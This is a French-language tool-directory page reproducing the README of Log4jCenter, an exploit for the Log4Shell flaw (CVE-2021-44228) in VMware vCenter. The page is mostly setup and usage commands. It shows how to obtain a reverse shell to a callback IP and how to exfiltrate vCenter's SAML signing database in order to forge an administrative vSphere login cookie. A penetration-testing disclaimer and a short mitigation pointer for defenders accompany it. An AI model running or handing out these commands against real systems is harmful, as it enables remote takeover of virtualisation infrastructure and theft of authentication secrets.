Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Log4jCenter — Exploitation de CVE-2021-44228 dans vCenter pour exécution de code à distance et plus. | Kitploit
Outils/GitHubGitHub/puzzlepeaches/log4jcenter
Analyse des VulnérabilitésExploitationExploitation d'Applications WebExfiltration de DonnéesTests d'IntrusionCommandement et Contrôle
GitHubpuzzlepeaches/log4jcenter

Log4jCenter

Exploitation de CVE-2021-44228 dans vCenter pour exécution de code à distance et plus.

Voir le dépôt
10519il y a 4 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Log4jCenter

Exploiter CVE-2021-44228 dans vCenter pour l'exécution de code à distance et plus encore. Article de blog détaillant l'exploitation ci-dessous :

  • Comment exploiter les vulnérabilités Log4j dans VMWare vCenter

Pourquoi ?

Les preuves de concept pour cette vulnérabilité sont éparpillées et doivent être réalisées manuellement. Ce dépôt automatise le processus d'exploitation et présente une voie d'attaque supplémentaire possible après l'exploitation.

Installation

Installation manuelle

Pour télécharger et exécuter l'exploit manuellement, suivez les étapes suivantes. Assurez-vous d'abord que Java et Maven sont installés sur votre machine d'attaque. Pour ce faire avec apt sur les systèmes d'exploitation basés sur Debian, exécutez la commande suivante :

root@kitploit:~
apt update && apt install openjdk-11-jre maven

Clonez le dépôt GitHub et installez toutes les dépendances Python :

root@kitploit:~
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jCenter \
    && cd Log4jCenter && pip3 install -r requirements.txt

Depuis la racine du dépôt Log4jCenter, compilez le projet Rogue-Jndi avec la commande ci-dessous :

root@kitploit:~
mvn package -f utils/rogue-jndi/

Installation avec Docker

Assurez-vous d'abord que Docker est installé sur votre machine d'attaque. (Je ne vais pas vous guider pas à pas pour cela)

Ensuite, exécutez la commande suivante pour cloner le dépôt et construire l'image Docker que nous utiliserons.

root@kitploit:~
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jCenter \
    && cd Log4jCenter && docker build -t log4jcenter .

Pour exécuter le conteneur, lancez une commande similaire à celle ci-dessous avec vos options de ligne de commande. Par exemple, la commande suivante serait utilisée pour exploiter vCenter et obtenir un reverse shell. Notez que le conteneur ne capturera pas le reverse shell. Vous devez créer un écouteur ncat dans une session shell séparée :

root@kitploit:~
docker run -it -v $(pwd)/loot:/Log4jCenter/loot -p 8090:8090 -p 1389:1389 log4jcenter \ 
    -t 10.100.100.1 -i 192.168.1.1 -p 4444 -r

Utilisation

root@kitploit:~
usage: exploit.py [-h] -t IP -i CALLBACK [-p PORT] [-e] [-r]

optional arguments:
  -h, --help            show this help message and exit
  -t IP, --target IP    vCenter Host IP
  -i CALLBACK, --ip CALLBACK
                        Callback IP for payload delivery and reverse shell.
  -p PORT, --port PORT  Callback port for reverse shell.
  -e, --exfiltrate      Module to pull SAML DB
  -r, --revshell        Module to establish reverse shell

Exemples

Obtenez un reverse shell en utilisant l'outil installé sur votre système local :

root@kitploit:~
python3 exploit.py -t vcenter.acme.com -i 10.10.10.1 -p 4444 -r

Exfiltrez les bases de données de signature SAML depuis un conteneur Docker :

root@kitploit:~
docker run -it -v $(pwd)/loot:/Log4jCenter/loot -p 1389:1389 -p 8090:8090 log4jcenter \
    -t 10.100.100.1 -i 192.168.1.1 -e

Remarques

  • Pour une raison inconnue, la charge utile du reverse shell peut ne pas se déclencher après la première exécution du script. Vous devrez peut-être exécuter l'exploit plusieurs fois pour obtenir le callback. Je vais explorer cela et inclure un correctif dans une future version.
  • Le dépôt vcenter_saml_login est inclus dans le répertoire utils. Vous pouvez l'utiliser en combinaison avec le flag e pour exfiltrer la base de données de signature SAML de vCenter et générer un cookie de connexion administrative pour vSphere. Vous devrez installer les dépendances séparément.
  • Pour les défenseurs, vous pouvez atténuer ce problème en utilisant un correctif à venir ou la solution de contournement détaillée ici

Avertissement

Cet outil est conçu pour être utilisé lors de tests de pénétration ; l'utilisation de cet outil pour attaquer des cibles sans consentement mutuel préalable est illégale. Il est de la responsabilité de l'utilisateur final de respecter toutes les lois locales, étatiques et fédérales applicables. Les développeurs déclinent toute responsabilité et ne sont pas responsables de toute utilisation abusive de ce programme.

Télécharger l’outil